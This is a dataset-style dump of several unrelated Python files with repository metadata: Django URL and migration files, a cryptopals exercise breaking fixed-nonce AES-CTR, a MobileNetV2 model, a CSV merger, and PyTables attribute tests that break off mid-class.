- bool: whether or not the target result exists
"""
return os.path.exists(os.path.join(self.dir, location))
| 34.203704 | 98 | 0.610179 |
82a9bbea57921a1e2e35c30897eab54f4e0ae832 | 266 | py | Python | project_b/project_b/urls.py | pdessauw/core-framework-demo | 27d2c1704b92e40220e062c30a4f40ff1f9ce674 | [
"MIT"
] | null | null | null | project_b/project_b/urls.py | pdessauw/core-framework-demo | 27d2c1704b92e40220e062c30a4f40ff1f9ce674 | [
"MIT"
] | null | null | null | project_b/project_b/urls.py | pdessauw/core-framework-demo | 27d2c1704b92e40220e062c30a4f40ff1f9ce674 | [
"MIT"
] | null | null | null | from django.conf.urls import include, url
from django.contrib import admin
import test_views
urlpatterns = [
url(r'^test$', test_views.template_test, name="test"),
url(r'^admin/', include(admin.site.urls)),
url(r'^', include("core_website.urls")),
]
| 20.461538 | 58 | 0.691729 |
832bb5583370dda17f42134290f455c1b2ae0ad3 | 697 | py | Python | set3/fixed_nonce_ctr_substitutions.py | adbforlife/cryptopals | 18bbc39e73f6a76725e792ec74b29cbcc8868409 | [
"MIT"
] | null | null | null | set3/fixed_nonce_ctr_substitutions.py | adbforlife/cryptopals | 18bbc39e73f6a76725e792ec74b29cbcc8868409 | [
"MIT"
] | null | null | null | set3/fixed_nonce_ctr_substitutions.py | adbforlife/cryptopals | 18bbc39e73f6a76725e792ec74b29cbcc8868409 | [
"MIT"
] | null | null | null | import sys
sys.path.append('/Users/ADB/Desktop/ /cryptopals')
from cryptotools import *
from base64 import b64decode
key = generate_key()
# Doing this by hand in an unsystematic way is worse than solving repeated key
# xors, which we use here.
if __name__ == '__main__':
ms = []
with open('set3/19.txt', 'r') as f:
ms = list(map(lambda x: b64decode(x.rstrip()), f.readlines()))
cs = list(map(lambda x: aes_ctr_encrypt(x, key), ms))
min_len = min(list(map(lambda x: len(x), cs)))
cs1 = list(map(lambda x: x[:min_len], cs))
print(len(b''.join(cs1)))
key = repeating_xor_guess_key(b''.join(cs1), len(cs1[0]))
print(len(cs1[0]))
print(len(key))
print(repeating_xor(b''.join(cs1), key))
| 30.304348 | 78 | 0.681492 |
733d364c567f125eb68ce5e1331e4f94ac2d5ad3 | 427 | py | Python | mapr/ojai/ojai_query/QueryOp.py | mapr/maprdb-python-client | ea7b7f1fb6c212e76bd799867e272eafd345f2e2 | [
"Apache-2.0"
] | 3 | 2020-04-01T12:01:50.000Z | 2022-03-23T01:18:36.000Z | mapr/ojai/ojai_query/QueryOp.py | mapr/maprdb-python-client | ea7b7f1fb6c212e76bd799867e272eafd345f2e2 | [
"Apache-2.0"
] | 7 | 2019-02-10T19:31:09.000Z | 2022-02-08T17:04:17.000Z | mapr/ojai/ojai_query/QueryOp.py | mapr/maprdb-python-client | ea7b7f1fb6c212e76bd799867e272eafd345f2e2 | [
"Apache-2.0"
] | 3 | 2020-05-27T09:52:32.000Z | 2021-09-07T14:16:43.000Z | from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from future import standard_library
standard_library.install_aliases()
from builtins import *
from aenum import Enum
class QueryOp(Enum):
LESS = "$lt"
LESS_OR_EQUAL = "$le"
EQUAL = "$eq"
NOT_EQUAL = "$ne"
GREATER_OR_EQUAL = "$ge"
GREATER = "$gt"
| 17.791667 | 39 | 0.737705 |
6962bce14a1ad8fff06af0756f0987ee3db3a65b | 7,445 | py | Python | backbone_nets/mobilenetv2_backbone.py | david1309/SynergyNet_bonseyes | 9d675f6e0c78222e1fa55e6598c3d11aa5dc799b | [
"MIT"
] | null | null | null | backbone_nets/mobilenetv2_backbone.py | david1309/SynergyNet_bonseyes | 9d675f6e0c78222e1fa55e6598c3d11aa5dc799b | [
"MIT"
] | null | null | null | backbone_nets/mobilenetv2_backbone.py | david1309/SynergyNet_bonseyes | 9d675f6e0c78222e1fa55e6598c3d11aa5dc799b | [
"MIT"
] | null | null | null | import torch
from torch import nn
from torch.hub import load_state_dict_from_url
__all__ = ['MobileNetV2', 'mobilenet_v2']
model_urls = {
'mobilenet_v2': 'https://download.pytorch.org/models/mobilenet_v2-b0353104.pth',
}
def _make_divisible(v, divisor, min_value=None):
"""
This function is taken from the original tf repo.
It ensures that all layers have a channel number that is divisible by 8
It can be seen here:
https://github.com/tensorflow/models/blob/master/research/slim/nets/mobilenet/mobilenet.py
:param v:
:param divisor:
:param min_value:
:return:
"""
if min_value is None:
min_value = divisor
new_v = max(min_value, int(v + divisor / 2) // divisor * divisor)
# Make sure that round down does not go down by more than 10%.
if new_v < 0.9 * v:
new_v += divisor
return new_v
class ConvBNReLU(nn.Sequential):
def __init__(self, in_planes, out_planes, kernel_size=3, stride=1, groups=1, norm_layer=None):
padding = (kernel_size - 1) // 2
if norm_layer is None:
norm_layer = nn.BatchNorm2d
super(ConvBNReLU, self).__init__(
nn.Conv2d(in_planes, out_planes, kernel_size, stride, padding, groups=groups, bias=False),
norm_layer(out_planes),
nn.ReLU6(inplace=True)
)
class InvertedResidual(nn.Module):
def __init__(self, inp, oup, stride, expand_ratio, norm_layer=None):
super(InvertedResidual, self).__init__()
self.stride = stride
assert stride in [1, 2]
if norm_layer is None:
norm_layer = nn.BatchNorm2d
hidden_dim = int(round(inp * expand_ratio))
self.use_res_connect = self.stride == 1 and inp == oup
layers = []
if expand_ratio != 1:
# pw
layers.append(ConvBNReLU(inp, hidden_dim, kernel_size=1, norm_layer=norm_layer))
layers.extend([
# dw
ConvBNReLU(hidden_dim, hidden_dim, stride=stride, groups=hidden_dim, norm_layer=norm_layer),
# pw-linear
nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False),
norm_layer(oup),
])
self.conv = nn.Sequential(*layers)
def forward(self, x):
if self.use_res_connect:
return x + self.conv(x)
else:
return self.conv(x)
class MobileNetV2(nn.Module):
def __init__(
self,
num_ori = 7,
num_shape = 199,
num_exp = 29,
width_mult=1.0,
inverted_residual_setting=None,
round_nearest=8,
block=None,
norm_layer=None
):
"""
MobileNet V2 main class
Args:
width_mult (float): Width multiplier - adjusts number of channels in each layer by this amount
inverted_residual_setting: Network structure
round_nearest (int): Round the number of channels in each layer to be a multiple of this number
Set to 1 to turn off rounding
block: Module specifying inverted residual building block for mobilenet
norm_layer: Module specifying the normalization layer to use
"""
super(MobileNetV2, self).__init__()
if block is None:
block = InvertedResidual
if norm_layer is None:
norm_layer = nn.BatchNorm2d
input_channel = 32
last_channel = 1280
if inverted_residual_setting is None:
inverted_residual_setting = [
# t, c, n, s
[1, 16, 1, 1],
[6, 24, 2, 2],
[6, 32, 3, 2],
[6, 64, 4, 2],
[6, 96, 3, 1],
[6, 160, 3, 2],
[6, 320, 1, 1],
]
# only check the first element, assuming user knows t,c,n,s are required
if len(inverted_residual_setting) == 0 or len(inverted_residual_setting[0]) != 4:
raise ValueError("inverted_residual_setting should be non-empty "
"or a 4-element list, got {}".format(inverted_residual_setting))
# building first layer
input_channel = _make_divisible(input_channel * width_mult, round_nearest)
self.last_channel = _make_divisible(last_channel * max(1.0, width_mult), round_nearest)
features = [ConvBNReLU(3, input_channel, stride=2, norm_layer=norm_layer)]
# building inverted residual blocks
for t, c, n, s in inverted_residual_setting:
output_channel = _make_divisible(c * width_mult, round_nearest)
for i in range(n):
stride = s if i == 0 else 1
features.append(block(input_channel, output_channel, stride, expand_ratio=t, norm_layer=norm_layer))
input_channel = output_channel
# building last several layers
features.append(ConvBNReLU(input_channel, self.last_channel, kernel_size=1, norm_layer=norm_layer))
# make it nn.Sequential
self.features = nn.Sequential(*features)
# building classifier
self.num_ori = num_ori
self.num_shape = num_shape
self.num_exp = num_exp
self.classifier_ori = nn.Sequential(
nn.Dropout(0.2),
nn.Linear(self.last_channel, self.num_ori),
)
self.classifier_shape = nn.Sequential(
nn.Dropout(0.2),
nn.Linear(self.last_channel, self.num_shape),
)
self.classifier_exp = nn.Sequential(
nn.Dropout(0.2),
nn.Linear(self.last_channel, self.num_exp),
)
# weight initialization
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out')
if m.bias is not None:
nn.init.zeros_(m.bias)
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.ones_(m.weight)
nn.init.zeros_(m.bias)
elif isinstance(m, nn.Linear):
nn.init.normal_(m.weight, 0, 0.01)
nn.init.zeros_(m.bias)
def _forward_impl(self, x):
# This exists since TorchScript doesn't support inheritance, so the superclass method
# (this one) needs to have a name other than `forward` that can be accessed in a subclass
x = self.features(x)
x = nn.functional.adaptive_avg_pool2d(x, 1)
x = x.reshape(x.shape[0], -1)
pool_x = x.clone()
x_ori = self.classifier_ori(x)
x_shape = self.classifier_shape(x)
x_exp = self.classifier_exp(x)
x = torch.cat((x_ori, x_shape, x_exp), dim=1)
return x, pool_x
def forward(self, x):
return self._forward_impl(x)
def mobilenet_v2(pretrained=False, progress=True, **kwargs):
"""
Constructs a MobileNetV2 architecture from
`"MobileNetV2: Inverted Residuals and Linear Bottlenecks" <https://arxiv.org/abs/1801.04381>`_.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
model = MobileNetV2(**kwargs)
if pretrained:
state_dict = load_state_dict_from_url(model_urls['mobilenet_v2'],
progress=progress)
model.load_state_dict(state_dict, strict=False)
return model | 35.117925 | 116 | 0.601343 |
fa3091a7e0aa94edcb8420e4aefae5bb2d85a8de | 4,041 | py | Python | timepiece/contracts/migrations/0001_initial.py | sha-red/django-timepiece | 52515dec027664890efbc535429e1ba1ee152f40 | [
"MIT"
] | 244 | 2015-01-08T11:06:52.000Z | 2022-03-24T14:59:26.000Z | timepiece/contracts/migrations/0001_initial.py | skampala1/django-timepiece | 52515dec027664890efbc535429e1ba1ee152f40 | [
"MIT"
] | 80 | 2015-01-23T13:45:02.000Z | 2021-11-25T09:17:05.000Z | timepiece/contracts/migrations/0001_initial.py | anfema/django-timepiece | c4594ae053bdb14c1dd7f17f32c6ef1bf0f3b453 | [
"MIT"
] | 109 | 2015-01-24T06:52:56.000Z | 2022-03-29T09:35:06.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='ContractAssignment',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('start_date', models.DateField()),
('end_date', models.DateField()),
('num_hours', models.DecimalField(default=0, max_digits=8, decimal_places=2)),
('min_hours_per_week', models.IntegerField(default=0)),
],
options={
'db_table': 'timepiece_contractassignment',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ContractHour',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('hours', models.DecimalField(default=0, max_digits=8, decimal_places=2)),
('date_requested', models.DateField()),
('date_approved', models.DateField(null=True, blank=True)),
('status', models.IntegerField(default=1, choices=[(1, b'Pending'), (2, b'Approved')])),
('notes', models.TextField(blank=True)),
],
options={
'db_table': 'timepiece_contracthour',
'verbose_name': 'contracted hours',
'verbose_name_plural': 'contracted hours',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='EntryGroup',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('status', models.CharField(default=b'invoiced', max_length=24, choices=[(b'not-invoiced', b'Not Invoiced'), (b'invoiced', b'Invoiced')])),
('number', models.CharField(max_length=50, null=True, verbose_name=b'Reference #', blank=True)),
('comments', models.TextField(null=True, blank=True)),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('start', models.DateField(null=True, blank=True)),
('end', models.DateField()),
],
options={
'db_table': 'timepiece_entrygroup',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='HourGroup',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(unique=True, max_length=255)),
('order', models.PositiveIntegerField(unique=True, null=True, blank=True)),
],
options={
'db_table': 'timepiece_hourgroup',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ProjectContract',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=255)),
('start_date', models.DateField()),
('end_date', models.DateField()),
('status', models.CharField(default=b'upcoming', max_length=32, choices=[(b'current', b'Current'), (b'complete', b'Complete'), (b'upcoming', b'Upcoming')])),
('type', models.IntegerField(choices=[(1, b'Fixed'), (2, b'Pre-paid Hourly'), (3, b'Post-paid Hourly')])),
],
options={
'ordering': ('-end_date',),
'db_table': 'timepiece_projectcontract',
'verbose_name': 'contract',
},
bases=(models.Model,),
),
]
| 44.406593 | 173 | 0.537491 |
157e0aebd49f783a4e748dadc160932bf847282f | 458 | py | Python | Scripts/single_points.py | matthewtoholland/Boronic-Acid-Catalysis | e2697831a0056b3aadf9e308d2fd4e0ed7a57bdf | [
"MIT"
] | null | null | null | Scripts/single_points.py | matthewtoholland/Boronic-Acid-Catalysis | e2697831a0056b3aadf9e308d2fd4e0ed7a57bdf | [
"MIT"
] | null | null | null | Scripts/single_points.py | matthewtoholland/Boronic-Acid-Catalysis | e2697831a0056b3aadf9e308d2fd4e0ed7a57bdf | [
"MIT"
] | null | null | null | import os
import glob
import pandas as pd
all_filenames = [i for i in glob.glob('/Users/matthewholland/OneDrive/Oxford/Amide Bond Formation/Data/single_points/*')]
combined_csv = pd.concat([pd.read_csv(f) for f in all_filenames])
combined_csv.to_csv('/Users/matthewholland/OneDrive/Oxford/Amide Bond Formation/Data/all_single_points.csv', index=False, header=['index', 'amine_single_point','acid_single_point','product_single_point','delta_g_reaction'])
| 41.636364 | 223 | 0.796943 |
5172a299ee05d856db7e60dc39302a0384c3b014 | 59,854 | py | Python | tables/tests/test_attributes.py | joshmoore/PyTables | 5065497fdc04f07c551c56b8b0280892fcffad03 | [
"BSD-3-Clause"
] | 3 | 2016-03-14T07:49:32.000Z | 2019-08-26T03:10:21.000Z | tables/tests/test_attributes.py | joshmoore/PyTables | 5065497fdc04f07c551c56b8b0280892fcffad03 | [
"BSD-3-Clause"
] | null | null | null | tables/tests/test_attributes.py | joshmoore/PyTables | 5065497fdc04f07c551c56b8b0280892fcffad03 | [
"BSD-3-Clause"
] | 4 | 2020-06-19T00:11:13.000Z | 2021-02-23T09:25:35.000Z | """ This test unit checks node atributes that are persistent (AttributeSet).
"""
import sys
import unittest
import os
import tempfile
import numpy
from numpy.testing import assert_array_equal, assert_almost_equal
from tables.parameters import NODE_CACHE_SLOTS
from tables import *
from tables.tests import common
from tables.tests.common import PyTablesTestCase
from tables.exceptions import DataTypeWarning
# To delete the internal attributes automagically
unittest.TestCase.tearDown = common.cleanup
class Record(IsDescription):
var1 = StringCol(itemsize=4) # 4-character String
var2 = IntCol() # integer
var3 = Int16Col() # short integer
var4 = FloatCol() # double (double-precision)
var5 = Float32Col() # float (single-precision)
class CreateTestCase(unittest.TestCase):
def setUp(self):
# Create an instance of HDF5 Table
self.file = tempfile.mktemp(".h5")
self.fileh = openFile(
self.file, mode = "w", NODE_CACHE_SLOTS=self.nodeCacheSlots)
self.root = self.fileh.root
# Create a table object
self.table = self.fileh.createTable(self.root, 'atable',
Record, "Table title")
# Create an array object
self.array = self.fileh.createArray(self.root, 'anarray',
[1], "Array title")
# Create a group object
self.group = self.fileh.createGroup(self.root, 'agroup',
"Group title")
def tearDown(self):
self.fileh.close()
os.remove(self.file)
common.cleanup(self)
#---------------------------------------
def test01_setAttributes(self):
"""Checking setting large string attributes (File methods)"""
attrlength = 2048
# Try to put a long string attribute on a group object
attr = self.fileh.setNodeAttr(self.root.agroup,
"attr1", "p" * attrlength)
# Now, try with a Table object
attr = self.fileh.setNodeAttr(self.root.atable,
"attr1", "a" * attrlength)
# Finally, try with an Array object
attr = self.fileh.setNodeAttr(self.root.anarray,
"attr1", "n" * attrlength)
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(
self.file, mode = "r+", NODE_CACHE_SLOTS=self.nodeCacheSlots)
self.root = self.fileh.root
self.assertEqual(self.fileh.getNodeAttr(self.root.agroup, 'attr1'),
"p" * attrlength)
self.assertEqual(self.fileh.getNodeAttr(self.root.atable, 'attr1'),
"a" * attrlength)
self.assertEqual(self.fileh.getNodeAttr(self.root.anarray, 'attr1'),
"n" * attrlength)
def test02_setAttributes(self):
"""Checking setting large string attributes (Node methods)"""
attrlength = 2048
# Try to put a long string attribute on a group object
self.root.agroup._f_setAttr('attr1', "p" * attrlength)
# Now, try with a Table object
self.root.atable.setAttr('attr1', "a" * attrlength)
# Finally, try with an Array object
self.root.anarray.setAttr('attr1', "n" * attrlength)
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(
self.file, mode = "r+", NODE_CACHE_SLOTS=self.nodeCacheSlots)
self.root = self.fileh.root
self.assertEqual(self.root.agroup._f_getAttr('attr1'), "p" * attrlength)
self.assertEqual(self.root.atable.getAttr("attr1"), "a" * attrlength)
self.assertEqual(self.root.anarray.getAttr("attr1"), "n" * attrlength)
def test03_setAttributes(self):
"""Checking setting large string attributes (AttributeSet methods)"""
attrlength = 2048
# Try to put a long string attribute on a group object
self.group._v_attrs.attr1 = "p" * attrlength
# Now, try with a Table object
self.table.attrs.attr1 = "a" * attrlength
# Finally, try with an Array object
self.array.attrs.attr1 = "n" * attrlength
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(
self.file, mode = "r+", NODE_CACHE_SLOTS=self.nodeCacheSlots)
self.root = self.fileh.root
# This should work even when the node cache is disabled
self.assertEqual(self.root.agroup._v_attrs.attr1, "p" * attrlength)
self.assertEqual(self.root.atable.attrs.attr1, "a" * attrlength)
self.assertEqual(self.root.anarray.attrs.attr1, "n" * attrlength)
def test04_listAttributes(self):
"""Checking listing attributes """
# With a Group object
self.group._v_attrs.pq = "1"
self.group._v_attrs.qr = "2"
self.group._v_attrs.rs = "3"
if common.verbose:
print "Attribute list:", self.group._v_attrs._f_list()
# Now, try with a Table object
self.table.attrs.a = "1"
self.table.attrs.c = "2"
self.table.attrs.b = "3"
if common.verbose:
print "Attribute list:", self.table.attrs._f_list()
# Finally, try with an Array object
self.array.attrs.k = "1"
self.array.attrs.j = "2"
self.array.attrs.i = "3"
if common.verbose:
print "Attribute list:", self.array.attrs._f_list()
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(
self.file, mode = "r+", NODE_CACHE_SLOTS=self.nodeCacheSlots)
self.root = self.fileh.root
agroup = self.root.agroup
self.assertEqual(agroup._v_attrs._f_list("user"), ["pq", "qr", "rs"])
self.assertEqual(agroup._v_attrs._f_list("sys"),
['CLASS', 'TITLE', 'VERSION'])
self.assertEqual(agroup._v_attrs._f_list("all"),
['CLASS', 'TITLE', 'VERSION', "pq", "qr", "rs"])
atable = self.root.atable
self.assertEqual(atable.attrs._f_list(), ["a", "b", "c"])
self.assertEqual(atable.attrs._f_list("sys"),
['CLASS',
'FIELD_0_FILL', 'FIELD_0_NAME',
'FIELD_1_FILL', 'FIELD_1_NAME',
'FIELD_2_FILL', 'FIELD_2_NAME',
'FIELD_3_FILL', 'FIELD_3_NAME',
'FIELD_4_FILL', 'FIELD_4_NAME',
'NROWS',
'TITLE', 'VERSION'])
self.assertEqual(atable.attrs._f_list("all"),
['CLASS',
'FIELD_0_FILL', 'FIELD_0_NAME',
'FIELD_1_FILL', 'FIELD_1_NAME',
'FIELD_2_FILL', 'FIELD_2_NAME',
'FIELD_3_FILL', 'FIELD_3_NAME',
'FIELD_4_FILL', 'FIELD_4_NAME',
'NROWS',
'TITLE', 'VERSION',
"a", "b", "c"])
anarray = self.root.anarray
self.assertEqual(anarray.attrs._f_list(), ["i", "j", "k"])
self.assertEqual(anarray.attrs._f_list("sys"),
['CLASS', 'FLAVOR', 'TITLE', 'VERSION'])
self.assertEqual(anarray.attrs._f_list("all"),
['CLASS', 'FLAVOR', 'TITLE', 'VERSION', "i", "j", "k"])
def test05_removeAttributes(self):
"""Checking removing attributes """
# With a Group object
self.group._v_attrs.pq = "1"
self.group._v_attrs.qr = "2"
self.group._v_attrs.rs = "3"
# delete an attribute
del self.group._v_attrs.pq
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(
self.file, mode = "r+", NODE_CACHE_SLOTS=self.nodeCacheSlots)
self.root = self.fileh.root
agroup = self.root.agroup
if common.verbose:
print "Attribute list:", agroup._v_attrs._f_list()
# Check the local attributes names
self.assertEqual(agroup._v_attrs._f_list(), ["qr", "rs"])
if common.verbose:
print "Attribute list in disk:", \
agroup._v_attrs._f_list("all")
# Check the disk attribute names
self.assertEqual(agroup._v_attrs._f_list("all"),
['CLASS', 'TITLE', 'VERSION', "qr", "rs"])
# delete an attribute (__delattr__ method)
del agroup._v_attrs.qr
if common.verbose:
print "Attribute list:", agroup._v_attrs._f_list()
# Check the local attributes names
self.assertEqual(agroup._v_attrs._f_list(), ["rs"])
if common.verbose:
print "Attribute list in disk:", \
agroup._v_attrs._f_list()
# Check the disk attribute names
self.assertEqual(agroup._v_attrs._f_list("all"),
['CLASS', 'TITLE', 'VERSION', "rs"])
def test05b_removeAttributes(self):
"""Checking removing attributes (using File.delNodeAttr()) """
# With a Group object
self.group._v_attrs.pq = "1"
self.group._v_attrs.qr = "2"
self.group._v_attrs.rs = "3"
# delete an attribute
self.fileh.delNodeAttr(self.group, "pq")
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(
self.file, mode = "r+", NODE_CACHE_SLOTS=self.nodeCacheSlots)
self.root = self.fileh.root
agroup = self.root.agroup
if common.verbose:
print "Attribute list:", agroup._v_attrs._f_list()
# Check the local attributes names
self.assertEqual(agroup._v_attrs._f_list(), ["qr", "rs"])
if common.verbose:
print "Attribute list in disk:", \
agroup._v_attrs._f_list("all")
# Check the disk attribute names
self.assertEqual(agroup._v_attrs._f_list("all"),
['CLASS', 'TITLE', 'VERSION', "qr", "rs"])
# delete an attribute (File.delNodeAttr method)
self.fileh.delNodeAttr(self.root, "qr", "agroup")
if common.verbose:
print "Attribute list:", agroup._v_attrs._f_list()
# Check the local attributes names
self.assertEqual(agroup._v_attrs._f_list(), ["rs"])
if common.verbose:
print "Attribute list in disk:", \
agroup._v_attrs._f_list()
# Check the disk attribute names
self.assertEqual(agroup._v_attrs._f_list("all"),
['CLASS', 'TITLE', 'VERSION', "rs"])
def test06_removeAttributes(self):
"""Checking removing system attributes """
# remove a system attribute
if common.verbose:
print "Before removing CLASS attribute"
print "System attrs:", self.group._v_attrs._v_attrnamessys
del self.group._v_attrs.CLASS
self.assertEqual(self.group._v_attrs._f_list("sys"),
['TITLE', 'VERSION'])
if common.verbose:
print "After removing CLASS attribute"
print "System attrs:", self.group._v_attrs._v_attrnamessys
def test07_renameAttributes(self):
"""Checking renaming attributes """
# With a Group object
self.group._v_attrs.pq = "1"
self.group._v_attrs.qr = "2"
self.group._v_attrs.rs = "3"
# rename an attribute
self.group._v_attrs._f_rename("pq", "op")
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(
self.file, mode = "r+", NODE_CACHE_SLOTS=self.nodeCacheSlots)
self.root = self.fileh.root
agroup = self.root.agroup
if common.verbose:
print "Attribute list:", agroup._v_attrs._f_list()
# Check the local attributes names (alphabetically sorted)
self.assertEqual(agroup._v_attrs._f_list(), ["op", "qr", "rs"])
if common.verbose:
print "Attribute list in disk:", agroup._v_attrs._f_list("all")
# Check the disk attribute names (not sorted)
self.assertEqual(agroup._v_attrs._f_list("all"),
['CLASS', 'TITLE', 'VERSION', "op", "qr", "rs"])
def test08_renameAttributes(self):
"""Checking renaming system attributes """
if common.verbose:
print "Before renaming CLASS attribute"
print "All attrs:", self.group._v_attrs._v_attrnames
# rename a system attribute
self.group._v_attrs._f_rename("CLASS", "op")
if common.verbose:
print "After renaming CLASS attribute"
print "All attrs:", self.group._v_attrs._v_attrnames
# Check the disk attribute names (not sorted)
agroup = self.root.agroup
self.assertEqual(agroup._v_attrs._f_list("all"),
['TITLE', 'VERSION', "op"])
def test09_overwriteAttributes(self):
"""Checking overwriting attributes """
# With a Group object
self.group._v_attrs.pq = "1"
self.group._v_attrs.qr = "2"
self.group._v_attrs.rs = "3"
# overwrite attributes
self.group._v_attrs.pq = "4"
self.group._v_attrs.qr = 2
self.group._v_attrs.rs = [1,2,3]
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(
self.file, mode = "r+", NODE_CACHE_SLOTS=self.nodeCacheSlots)
self.root = self.fileh.root
agroup = self.root.agroup
if common.verbose:
print "Value of Attribute pq:", agroup._v_attrs.pq
# Check the local attributes names (alphabetically sorted)
self.assertEqual(agroup._v_attrs.pq, "4")
self.assertEqual(agroup._v_attrs.qr, 2)
self.assertEqual(agroup._v_attrs.rs, [1,2,3])
if common.verbose:
print "Attribute list in disk:", \
agroup._v_attrs._f_list("all")
# Check the disk attribute names (not sorted)
self.assertEqual(agroup._v_attrs._f_list("all"),
['CLASS', 'TITLE', 'VERSION', "pq", "qr", "rs"])
def test10a_copyAttributes(self):
"""Checking copying attributes """
# With a Group object
self.group._v_attrs.pq = "1"
self.group._v_attrs.qr = "2"
self.group._v_attrs.rs = "3"
# copy all attributes from "/agroup" to "/atable"
self.group._v_attrs._f_copy(self.root.atable)
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(
self.file, mode = "r+", NODE_CACHE_SLOTS=self.nodeCacheSlots)
self.root = self.fileh.root
atable = self.root.atable
if common.verbose:
print "Attribute list:", atable._v_attrs._f_list()
# Check the local attributes names (alphabetically sorted)
self.assertEqual(atable._v_attrs._f_list(), ["pq", "qr", "rs"])
if common.verbose:
print "Complete attribute list:", atable._v_attrs._f_list("all")
# Check the disk attribute names (not sorted)
self.assertEqual(atable._v_attrs._f_list("all"),
['CLASS',
'FIELD_0_FILL', 'FIELD_0_NAME',
'FIELD_1_FILL', 'FIELD_1_NAME',
'FIELD_2_FILL', 'FIELD_2_NAME',
'FIELD_3_FILL', 'FIELD_3_NAME',
'FIELD_4_FILL', 'FIELD_4_NAME',
'NROWS',
'TITLE', 'VERSION',
"pq", "qr", "rs"])
def test10b_copyAttributes(self):
"""Checking copying attributes (copyNodeAttrs)"""
# With a Group object
self.group._v_attrs.pq = "1"
self.group._v_attrs.qr = "2"
self.group._v_attrs.rs = "3"
# copy all attributes from "/agroup" to "/atable"
self.fileh.copyNodeAttrs(self.group, self.root.atable)
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(
self.file, mode = "r+", NODE_CACHE_SLOTS=self.nodeCacheSlots)
self.root = self.fileh.root
atable = self.root.atable
if common.verbose:
print "Attribute list:", atable._v_attrs._f_list()
# Check the local attributes names (alphabetically sorted)
self.assertEqual(atable._v_attrs._f_list(), ["pq", "qr", "rs"])
if common.verbose:
print "Complete attribute list:", atable._v_attrs._f_list("all")
# Check the disk attribute names (not sorted)
self.assertEqual(atable._v_attrs._f_list("all"),
['CLASS',
'FIELD_0_FILL', 'FIELD_0_NAME',
'FIELD_1_FILL', 'FIELD_1_NAME',
'FIELD_2_FILL', 'FIELD_2_NAME',
'FIELD_3_FILL', 'FIELD_3_NAME',
'FIELD_4_FILL', 'FIELD_4_NAME',
'NROWS',
'TITLE', 'VERSION',
"pq", "qr", "rs"])
def test10c_copyAttributes(self):
"""Checking copying attributes during group copies"""
# With a Group object
self.group._v_attrs['CLASS'] = "GROUP2"
self.group._v_attrs['VERSION'] = "1.3"
# copy "/agroup" to "/agroup2"
self.fileh.copyNode(self.group, self.root, "agroup2")
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(
self.file, mode = "r+", NODE_CACHE_SLOTS=self.nodeCacheSlots)
self.root = self.fileh.root
agroup2 = self.root.agroup2
if common.verbose:
print "Complete attribute list:", agroup2._v_attrs._f_list("all")
self.assertEqual(agroup2._v_attrs['CLASS'], "GROUP2")
self.assertEqual(agroup2._v_attrs['VERSION'], "1.3")
def test10d_copyAttributes(self):
"""Checking copying attributes during leaf copies"""
# With a Group object
atable = self.root.atable
atable._v_attrs['CLASS'] = "TABLE2"
atable._v_attrs['VERSION'] = "1.3"
# copy "/agroup" to "/agroup2"
self.fileh.copyNode(atable, self.root, "atable2")
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(
self.file, mode = "r+", NODE_CACHE_SLOTS=self.nodeCacheSlots)
self.root = self.fileh.root
atable2 = self.root.atable2
if common.verbose:
print "Complete attribute list:", atable2._v_attrs._f_list("all")
self.assertEqual(atable2._v_attrs['CLASS'], "TABLE2")
self.assertEqual(atable2._v_attrs['VERSION'], "1.3")
def test11a_getitem(self):
"""Checking the __getitem__ interface."""
attrs = self.group._v_attrs
attrs.pq = "1"
self.assertEqual(attrs['pq'], "1")
def test11b_setitem(self):
"""Checking the __setitem__ interface."""
attrs = self.group._v_attrs
attrs['pq'] = "2"
self.assertEqual(attrs['pq'], "2")
def test11c_delitem(self):
"""Checking the __delitem__ interface."""
attrs = self.group._v_attrs
attrs.pq = "1"
del attrs['pq']
self.assertTrue('pq' not in attrs._f_list())
def test11d_KeyError(self):
"""Checking that KeyError is raised in __getitem__/__delitem__."""
attrs = self.group._v_attrs
self.assertRaises(KeyError, attrs.__getitem__, 'pq')
self.assertRaises(KeyError, attrs.__delitem__, 'pq')
class NotCloseCreate(CreateTestCase):
close = False
nodeCacheSlots = NODE_CACHE_SLOTS
class CloseCreate(CreateTestCase):
close = True
nodeCacheSlots = NODE_CACHE_SLOTS
class NoCacheNotCloseCreate(CreateTestCase):
